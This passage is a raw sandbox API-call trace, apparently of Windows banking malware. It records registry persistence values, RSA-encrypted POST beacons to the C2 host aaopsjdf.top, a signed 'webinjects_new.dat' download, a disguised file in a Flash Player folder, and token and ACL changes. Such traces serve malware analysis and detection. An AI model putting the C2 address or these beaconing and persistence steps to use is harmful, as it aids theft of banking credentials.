(hMem=0x6060b8) returned 0x0 [0225.869] LocalFree (hMem=0x627040) returned 0x0 [0225.871] CryptDestroyKey (hKey=0x5dae90) returned 1 [0225.871] CreateMutexW (lpMutexAttributes=0xc77e4, bInitialOwner=0, lpName="ABC6B5B774FF9FD7F54EC277098C64EE") returned 0x340 [0225.871] WaitForSingleObject (hHandle=0x340, dwMilliseconds=0xffffffff) returned 0x0 [0225.871] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x286e1f0 | out: phkResult=0x286e1f0*=0x548) returned 0x0 [0225.871] RegQueryValueExW (in: hKey=0x548, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x286e21c, lpData=0x0, lpcbData=0x286e204*=0x0 | out: lpType=0x286e21c*=0x3, lpData=0x0, lpcbData=0x286e204*=0x6f0) returned 0x0 [0225.871] RegQueryValueExW (in: hKey=0x548, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x286e21c, lpData=0xf0e358, lpcbData=0x286e204*=0x6f0 | out: lpType=0x286e21c*=0x3, lpData=0xf0e358*, lpcbData=0x286e204*=0x6f0) returned 0x0 [0225.871] RegCloseKey (hKey=0x548) returned 0x0 [0225.872] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x286e204, lpdwDisposition=0x0 | out: phkResult=0x286e204*=0x548, lpdwDisposition=0x0) returned 0x0 [0225.872] RegSetValueExW (in: hKey=0x548, lpValueName="Baywkivyl", Reserved=0x0, dwType=0x3, lpData=0xf0e358*, cbData=0x6f0 | out: lpData=0xf0e358*) returned 0x0 [0225.872] RegCloseKey (hKey=0x548) returned 0x0 [0225.872] ReleaseMutex (hMutex=0x340) returned 1 [0225.872] CloseHandle (hObject=0x340) returned 1 [0225.872] CreateMutexW (lpMutexAttributes=0xc77e4, bInitialOwner=0, lpName="ABC6B5B774FF9FD7F54EC277098C64EE") returned 0x340 [0225.872] WaitForSingleObject (hHandle=0x340, dwMilliseconds=0xffffffff) returned 0x0 [0225.873] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x286e928 | out: phkResult=0x286e928*=0x548) returned 0x0 [0225.873] RegQueryValueExW (in: hKey=0x548, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x286e954, lpData=0x0, lpcbData=0x286e93c*=0x0 | out: lpType=0x286e954*=0x3, lpData=0x0, lpcbData=0x286e93c*=0x6f0) returned 0x0 [0225.873] RegQueryValueExW (in: hKey=0x548, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x286e954, lpData=0xf0d330, lpcbData=0x286e93c*=0x6f0 | out: lpType=0x286e954*=0x3, lpData=0xf0d330*, lpcbData=0x286e93c*=0x6f0) returned 0x0 [0225.873] RegCloseKey (hKey=0x548) returned 0x0 [0225.873] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x286e93c, lpdwDisposition=0x0 | out: phkResult=0x286e93c*=0x548, lpdwDisposition=0x0) returned 0x0 [0225.873] RegSetValueExW (in: hKey=0x548, lpValueName="Baywkivyl", Reserved=0x0, dwType=0x3, lpData=0xf0d330*, cbData=0x6f0 | out: lpData=0xf0d330*) returned 0x0 [0225.873] RegCloseKey (hKey=0x548) returned 0x0 [0225.873] ReleaseMutex (hMutex=0x340) returned 1 [0225.873] CloseHandle (hObject=0x340) returned 1 [0225.873] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x286f44c | out: phkResult=0x286f44c*=0x340) returned 0x0 [0225.874] RegQueryValueExW (in: hKey=0x340, lpValueName="Omegovna", lpReserved=0x0, lpType=0x286f478, lpData=0x0, lpcbData=0x286f460*=0x0 | out: lpType=0x286f478*=0x3, lpData=0x0, lpcbData=0x286f460*=0x6f0) returned 0x0 [0225.874] RegQueryValueExW (in: hKey=0x340, lpValueName="Omegovna", lpReserved=0x0, lpType=0x286f478, lpData=0xf0d330, lpcbData=0x286f460*=0x6f0 | out: lpType=0x286f478*=0x3, lpData=0xf0d330*, lpcbData=0x286f460*=0x6f0) returned 0x0 [0225.874] RegCloseKey (hKey=0x340) returned 0x0 [0225.874] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x286ea64 | out: phkResult=0x286ea64*=0x340) returned 0x0 [0225.874] RegQueryValueExW (in: hKey=0x340, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x286ea90, lpData=0x0, lpcbData=0x286ea78*=0x0 | out: lpType=0x286ea90*=0x3, lpData=0x0, lpcbData=0x286ea78*=0x6f0) returned 0x0 [0225.874] RegQueryValueExW (in: hKey=0x340, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x286ea90, lpData=0xf0da48, lpcbData=0x286ea78*=0x6f0 | out: lpType=0x286ea90*=0x3, lpData=0xf0da48*, lpcbData=0x286ea78*=0x6f0) returned 0x0 [0225.874] RegCloseKey (hKey=0x340) returned 0x0 [0225.874] InternetCrackUrlA (in: lpszUrl="https://aaopsjdf.top/webinjects_new.dat", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x286f3f8 | out: lpUrlComponents=0x286f3f8) returned 1 [0225.874] GetSystemTime (in: lpSystemTime=0x286f0a8 | out: lpSystemTime=0x286f0a8*(wYear=0x7e2, wMonth=0x1, wDayOfWeek=0x3, wDay=0xa, wHour=0x12, wMinute=0x37, wSecond=0x8, wMilliseconds=0x20d)) [0225.874] SystemTimeToFileTime (in: lpSystemTime=0x286f0a8, lpFileTime=0x286f0b8 | out: lpFileTime=0x286f0b8) returned 1 [0225.874] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x286f130, nSize=0x286f0dc | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x286f0dc) returned 0x1 [0225.875] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YKYD69Q\\aETAdzjz", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0225.875] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x286f02c | out: phkResult=0x286f02c*=0x340) returned 0x0 [0225.875] RegQueryValueExW (in: hKey=0x340, lpValueName="Omegovna", lpReserved=0x0, lpType=0x286f058, lpData=0x0, lpcbData=0x286f040*=0x0 | out: lpType=0x286f058*=0x3, lpData=0x0, lpcbData=0x286f040*=0x6f0) returned 0x0 [0225.875] RegQueryValueExW (in: hKey=0x340, lpValueName="Omegovna", lpReserved=0x0, lpType=0x286f058, lpData=0xf0da48, lpcbData=0x286f040*=0x6f0 | out: lpType=0x286f058*=0x3, lpData=0xf0da48*, lpcbData=0x286f040*=0x6f0) returned 0x0 [0225.875] RegCloseKey (hKey=0x340) returned 0x0 [0225.875] wvnsprintfW (in: pszDest=0x286f0e4, cchDest=10, pszFmt="%u.%u.%u", arglist=0x286f0bc | out: pszDest="2.6.1") returned 5 [0225.875] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="2.6.1", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0225.875] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x286f29e, cbEncoded=0x125, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x286f000, pcbStructInfo=0x286efe4 | out: pvStructInfo=0x286f000, pcbStructInfo=0x286efe4) returned 1 [0225.875] CryptImportPublicKeyInfo (in: hCryptProv=0x5ce888, dwCertEncodingType=0x1, pInfo=0x605588*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x6055b8*, PublicKey.cbData=0x10d, PublicKey.pbData=0x6055c0*, PublicKey.cUnusedBits=0x0), phKey=0x286eff0 | out: phKey=0x286eff0*=0x5dae90) returned 1 [0225.875] LocalFree (hMem=0x605588) returned 0x0 [0225.876] wvnsprintfA (in: pszDest=0xf0cc60, cchDest=21, pszFmt="%d", arglist=0x286ef04 | out: pszDest="1515610508") returned 10 [0225.876] CryptEncrypt (in: hKey=0x5dae90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x286ee50*=0x20, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x286ee50*=0x100) returned 1 [0225.876] CryptEncrypt (in: hKey=0x5dae90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xf0c948*, pdwDataLen=0x286ee64*=0x20, dwBufLen=0x100 | out: pbData=0xf0c948*, pdwDataLen=0x286ee64*=0x100) returned 1 [0225.876] CryptDestroyKey (hKey=0x5dae90) returned 1 [0225.876] InternetCrackUrlA (in: lpszUrl="https://aaopsjdf.top/webinjects_new.dat", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x286ef60 | out: lpUrlComponents=0x286ef60) returned 1 [0225.876] wvnsprintfA (in: pszDest=0xf0c848, cchDest=516, pszFmt="%s%s", arglist=0x286ef98 | out: pszDest="https://aaopsjdf.top/Ar1DanzSs/m3/R4FdJSDs6/d5Y/uB/4CGO/Dw") returned 58 [0225.876] InternetCrackUrlA (in: lpszUrl="https://aaopsjdf.top/Ar1DanzSs/m3/R4FdJSDs6/d5Y/uB/4CGO/Dw", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x286ef58 | out: lpUrlComponents=0x286ef58) returned 1 [0225.876] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0225.876] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x2, lpBuffer=0xc4024, dwBufferLength=0x4) returned 1 [0225.876] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0xc402c, dwBufferLength=0x4) returned 1 [0225.876] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0xc4034, dwBufferLength=0x4) returned 1 [0225.876] InternetConnectA (hInternet=0xcc0004, lpszServerName="aaopsjdf.top", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0225.876] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="/Ar1DanzSs/m3/R4FdJSDs6/d5Y/uB/4CGO/Dw", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0xc4000*="text/html", dwFlags=0x8484f700, dwContext=0x0) returned 0xcc000c [0225.877] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Connection: close\r\n\x1f0Zñ", dwHeadersLength=0x13, lpOptional=0xf0d330, dwOptionalLength=0x2c0) returned 0 [0226.087] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x286ee7c, lpdwBufferLength=0x286ee80 | out: lpBuffer=0x286ee7c, lpdwBufferLength=0x286ee80) returned 1 [0226.087] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x286ee7c, dwBufferLength=0x4) returned 1 [0226.087] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Connection: close\r\n\x1f0Zñ", dwHeadersLength=0x13, lpOptional=0xf0d330*, dwOptionalLength=0x2c0 | out: lpOptional=0xf0d330*) returned 1 [0226.555] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x286ee7c, lpdwBufferLength=0x286ee80, lpdwIndex=0x0 | out: lpBuffer=0x286ee7c*, lpdwBufferLength=0x286ee80*=0x4, lpdwIndex=0x0) returned 1 [0226.555] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0226.556] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xf15a30, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x286ef90 | out: lpBuffer=0xf15a30*, lpdwNumberOfBytesRead=0x286ef90*=0xc98) returned 1 [0226.556] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0226.556] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xf166c8, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x286ef90 | out: lpBuffer=0xf166c8*, lpdwNumberOfBytesRead=0x286ef90*=0x0) returned 1 [0226.557] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0226.558] InternetQueryOptionA (in: hInternet=0xcc0008, dwOption=0x15, lpBuffer=0x286ef8c, lpdwBufferLength=0x286ef88 | out: lpBuffer=0x286ef8c, lpdwBufferLength=0x286ef88) returned 1 [0226.558] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0226.558] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0226.558] CryptImportKey (in: hProv=0x5ce888, pbData=0xf0c848, dwDataLen=0x120, hPubKey=0x0, dwFlags=0x0, phKey=0x286f42c | out: phKey=0x286f42c*=0x5dae90) returned 1 [0226.558] CryptCreateHash (in: hProv=0x5ce888, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x286f420 | out: phHash=0x286f420) returned 1 [0226.558] CryptHashData (hHash=0x5db450, pbData=0xf166d0, dwDataLen=0x2d0, dwFlags=0x0) returned 1 [0226.558] CryptVerifySignatureW (hHash=0x5db450, pbSignature=0xf0c848, dwSigLen=0x100, hPubKey=0x5dae90, szDescription=0x0, dwFlags=0x0) returned 1 [0226.558] CryptDestroyHash (hHash=0x5db450) returned 1 [0226.558] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\Microsoft OneDrive.rig" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\microsoft onedrive.rig"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x548 [0226.558] WriteFile (in: hFile=0x548, lpBuffer=0xf166d0*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x286f40c, lpOverlapped=0x0 | out: lpBuffer=0xf166d0*, lpNumberOfBytesWritten=0x286f40c*=0x2d0, lpOverlapped=0x0) returned 1 [0226.559] CloseHandle (hObject=0x548) returned 1 [0226.559] GetCurrentThread () returned 0xfffffffe [0226.559] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x286f3e4 | out: TokenHandle=0x286f3e4*=0x0) returned 0 [0226.559] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x286f3e4 | out: TokenHandle=0x286f3e4*=0x548) returned 1 [0226.559] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x286f3d8 | out: lpLuid=0x286f3d8*(LowPart=0x8, HighPart=0)) returned 1 [0226.560] AdjustTokenPrivileges (in: TokenHandle=0x548, DisableAllPrivileges=0, NewState=0x286f3d4*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0226.560] GetLastError () returned 0x514 [0226.560] CloseHandle (hObject=0x548) returned 1 [0226.560] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0226.560] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x657aa8, lpbSaclPresent=0x286f3fc, pSacl=0x286f408, lpbSaclDefaulted=0x286f400 | out: lpbSaclPresent=0x286f3fc, pSacl=0x286f408, lpbSaclDefaulted=0x286f400) returned 1 [0226.560] SetNamedSecurityInfoW () returned 0x0 [0226.561] LocalFree (hMem=0x657aa8) returned 0x0 [0226.561] GetNamedSecurityInfoW () returned 0x0 [0226.561] AllocateAndInitializeSid (in: pIdentifierAuthority=0x286f3c8, nSubAuthorityCount=0x2, nSubAuthority0=0x2, nSubAuthority1=0x1, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x286f3d8 | out: pSid=0x286f3d8*=0x6548e0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0xf), SubAuthority=([0]=0x2, [1]=0x0))) returned 1 [0226.561] SetEntriesInAclW () returned 0x0 [0226.561] SetNamedSecurityInfoW () returned 0x0 [0226.562] LocalFree (hMem=0x6060b8) returned 0x0 [0226.562] LocalFree (hMem=0x6270b8) returned 0x0 [0226.562] CryptDestroyKey (hKey=0x5dae90) returned 1 [0226.562] CreateMutexW (lpMutexAttributes=0xc77e4, bInitialOwner=0, lpName="ABC6B5B774FF9FD7F54EC277098C64EE") returned 0x548 [0226.562] WaitForSingleObject (hHandle=0x548, dwMilliseconds=0xffffffff) returned 0x0 [0226.562] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x286ea50 | out: phkResult=0x286ea50*=0x340) returned 0x0 [0226.562] RegQueryValueExW (in: hKey=0x340, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x286ea7c, lpData=0x0, lpcbData=0x286ea64*=0x0 | out: lpType=0x286ea7c*=0x3, lpData=0x0, lpcbData=0x286ea64*=0x6f0) returned 0x0 [0226.562] RegQueryValueExW (in: hKey=0x340, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x286ea7c, lpData=0xf0da48, lpcbData=0x286ea64*=0x6f0 | out: lpType=0x286ea7c*=0x3, lpData=0xf0da48*, lpcbData=0x286ea64*=0x6f0) returned 0x0 [0226.562] RegCloseKey (hKey=0x340) returned 0x0 [0226.563] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x286ea64, lpdwDisposition=0x0 | out: phkResult=0x286ea64*=0x340, lpdwDisposition=0x0) returned 0x0 [0226.563] RegSetValueExW (in: hKey=0x340, lpValueName="Baywkivyl", Reserved=0x0, dwType=0x3, lpData=0xf0d330*, cbData=0x6f0 | out: lpData=0xf0d330*) returned 0x0 [0226.563] RegCloseKey (hKey=0x340) returned 0x0 [0226.563] ReleaseMutex (hMutex=0x548) returned 1 [0226.563] CloseHandle (hObject=0x548) returned 1 [0226.563] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x493e0) Thread: id = 166 os_tid = 0x98c [0214.998] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x291fabc | out: phkResult=0x291fabc*=0x10c) returned 0x0 [0214.998] RegQueryValueExW (in: hKey=0x10c, lpValueName="Omegovna", lpReserved=0x0, lpType=0x291fae8, lpData=0x0, lpcbData=0x291fad0*=0x0 | out: lpType=0x291fae8*=0x0, lpData=0x0, lpcbData=0x291fad0*=0x0) returned 0x2 [0214.998] RegCloseKey (hKey=0x10c) returned 0x0 [0214.998] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\ro4p00rrfog3ie0ev3.ecv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0214.998] GetFileSizeEx (in: hFile=0x10c, lpFileSize=0x291fac0 | out: lpFileSize=0x291fac0*=0) returned 1 [0214.998] CloseHandle (hObject=0x10c) returned 1 [0214.998] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0214.998] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x291f134 | out: phkResult=0x291f134*=0x10c) returned 0x0 [0214.998] RegQueryValueExW (in: hKey=0x10c, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x291f160, lpData=0x0, lpcbData=0x291f148*=0x0 | out: lpType=0x291f160*=0x3, lpData=0x0, lpcbData=0x291f148*=0x6f0) returned 0x0 [0214.998] RegQueryValueExW (in: hKey=0x10c, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x291f160, lpData=0xed0590, lpcbData=0x291f148*=0x6f0 | out: lpType=0x291f160*=0x3, lpData=0xed0590*, lpcbData=0x291f148*=0x6f0) returned 0x0 [0214.998] RegCloseKey (hKey=0x10c) returned 0x0 [0214.998] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x291f1cc | out: phkResult=0x291f1cc*=0x10c) returned 0x0 [0214.999] RegQueryValueExW (in: hKey=0x10c, lpValueName="Omegovna", lpReserved=0x0, lpType=0x291f1f8, lpData=0x0, lpcbData=0x291f1e0*=0x0 | out: lpType=0x291f1f8*=0x0, lpData=0x0, lpcbData=0x291f1e0*=0x0) returned 0x2 [0214.999] RegCloseKey (hKey=0x10c) returned 0x0 [0214.999] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\ro4p00rrfog3ie0ev3.ecv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0214.999] GetFileSizeEx (in: hFile=0x10c, lpFileSize=0x291f1d0 | out: lpFileSize=0x291f1d0*=0) returned 1 [0214.999] CloseHandle (hObject=0x10c) returned 1 [0214.999] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x291f0c4 | out: phkResult=0x291f0c4*=0x10c) returned 0x0 [0214.999] RegQueryValueExW (in: hKey=0x10c, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x291f0f0, lpData=0x0, lpcbData=0x291f0d8*=0x0 | out: lpType=0x291f0f0*=0x3, lpData=0x0, lpcbData=0x291f0d8*=0x6f0) returned 0x0 [0214.999] RegQueryValueExW (in: hKey=0x10c, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x291f0f0, lpData=0xed0590, lpcbData=0x291f0d8*=0x6f0 | out: lpType=0x291f0f0*=0x3, lpData=0xed0590*, lpcbData=0x291f0d8*=0x6f0) returned 0x0 [0214.999] RegCloseKey (hKey=0x10c) returned 0x0 [0214.999] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x291fa44 | out: phkResult=0x291fa44*=0x10c) returned 0x0 [0214.999] RegQueryValueExW (in: hKey=0x10c, lpValueName="Omegovna", lpReserved=0x0, lpType=0x291fa70, lpData=0x0, lpcbData=0x291fa58*=0x0 | out: lpType=0x291fa70*=0x0, lpData=0x0, lpcbData=0x291fa58*=0x0) returned 0x2 [0214.999] RegCloseKey (hKey=0x10c) returned 0x0 [0214.999] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\ro4p00rrfog3ie0ev3.ecv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0214.999] GetFileSizeEx (in: hFile=0x10c, lpFileSize=0x291fa48 | out: lpFileSize=0x291fa48*=0) returned 1 [0215.000] CloseHandle (hObject=0x10c) returned 1 [0215.000] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x291f0c4 | out: phkResult=0x291f0c4*=0x10c) returned 0x0 [0215.000] RegQueryValueExW (in: hKey=0x10c, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x291f0f0, lpData=0x0, lpcbData=0x291f0d8*=0x0 | out: lpType=0x291f0f0*=0x3, lpData=0x0, lpcbData=0x291f0d8*=0x6f0) returned 0x0 [0215.000] RegQueryValueExW (in: hKey=0x10c, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x291f0f0, lpData=0xed0590, lpcbData=0x291f0d8*=0x6f0 | out: lpType=0x291f0f0*=0x3, lpData=0xed0590*, lpcbData=0x291f0d8*=0x6f0) returned 0x0 [0215.000] RegCloseKey (hKey=0x10c) returned 0x0 [0215.000] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x291fa44 | out: phkResult=0x291fa44*=0x10c) returned 0x0 [0215.000] RegQueryValueExW (in: hKey=0x10c, lpValueName="Omegovna", lpReserved=0x0, lpType=0x291fa70, lpData=0x0, lpcbData=0x291fa58*=0x0 | out: lpType=0x291fa70*=0x0, lpData=0x0, lpcbData=0x291fa58*=0x0) returned 0x2 [0215.000] RegCloseKey (hKey=0x10c) returned 0x0 [0215.000] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\ro4p00rrfog3ie0ev3.ecv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0215.000] GetFileSizeEx (in: hFile=0x10c, lpFileSize=0x291fa48 | out: lpFileSize=0x291fa48*=0) returned 1 [0215.000] CloseHandle (hObject=0x10c) returned 1 [0215.000] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x291f0c4 | out: phkResult=0x291f0c4*=0x10c) returned 0x0 [0215.000] RegQueryValueExW (in: hKey=0x10c, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x291f0f0, lpData=0x0, lpcbData=0x291f0d8*=0x0 | out: lpType=0x291f0f0*=0x3, lpData=0x0, lpcbData=0x291f0d8*=0x6f0) returned 0x0 [0215.000] RegQueryValueExW (in: hKey=0x10c, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x291f0f0, lpData=0xed0590, lpcbData=0x291f0d8*=0x6f0 | out: lpType=0x291f0f0*=0x3, lpData=0xed0590*, lpcbData=0x291f0d8*=0x6f0) returned 0x0 [0215.000] RegCloseKey (hKey=0x10c) returned 0x0 [0215.001] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x291fa44 | out: phkResult=0x291fa44*=0x10c) returned 0x0 [0215.001] RegQueryValueExW (in: hKey=0x10c, lpValueName="Omegovna", lpReserved=0x0, lpType=0x291fa70, lpData=0x0, lpcbData=0x291fa58*=0x0 | out: lpType=0x291fa70*=0x0, lpData=0x0, lpcbData=0x291fa58*=0x0) returned 0x2 [0215.001] RegCloseKey (hKey=0x10c) returned 0x0 [0215.001] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\ro4p00rrfog3ie0ev3.ecv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 